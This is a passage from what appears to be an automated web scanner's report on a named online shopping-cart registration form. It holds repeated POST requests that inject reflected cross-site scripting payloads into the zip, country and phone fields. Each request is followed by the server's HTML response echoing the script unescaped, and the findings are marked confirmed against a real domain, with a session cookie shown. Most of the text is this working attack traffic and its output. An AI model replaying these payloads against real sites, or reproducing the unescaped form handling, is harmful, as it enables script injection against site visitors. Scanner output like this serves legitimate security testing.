Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000240)%3c%2fscript%3e&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:50:14 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="'"--></style></script><script>netsparker(0x000240)</script>"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST '"--></style></script><script>alert(0x000241)</script>
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000241)%3c%2fscript%3e&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:50:17 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="'"--></style></script><script>netsparker(0x000241)</script>"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST '"--></style></script><script>alert(0x000242)</script>
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000242)%3c%2fscript%3e&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:50:20 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x000242)</script>"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

